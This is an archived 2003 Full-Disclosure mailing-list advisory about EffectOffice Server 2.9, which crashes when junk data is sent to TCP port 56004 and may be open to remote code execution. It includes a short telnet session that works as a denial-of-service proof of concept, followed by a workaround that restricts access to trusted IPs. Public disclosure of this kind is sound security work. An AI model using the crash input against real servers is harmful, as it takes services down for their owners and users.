|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] [securitylab.ru] EffectOffice Server 2.9 problem
From: Alexander Antipov (antipov
SecurityLab.ru)
Date: Thu Nov 20 2003 - 07:57:02 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Application: EffectOffice Server 2.9
Vendor: EffectOffice
Vendor Site: http://www.EffectOffice.com
Remote: Yes
Exploitable: Yes
Risk level: High
Authors: D_BuG (d_bug bk.ru)
Authors Site: http://www.securitylab.ru
Description:
A vulnerability identified in EffectOffice can be exploited by a
malicious person to cause a Denial of Service and under specific
condition can lead to buffer overflow with possibility of remote code
execution.
Remote user could send a specially crafted data to 56004 TCP port on
target server to potentially cause the system to crash.
Exploit:
hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnet>close
telnet>quit
hacker#
Crash service
Workaround: Restrict access to the service allowing only connection
attempts from trusted IPs if possible.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]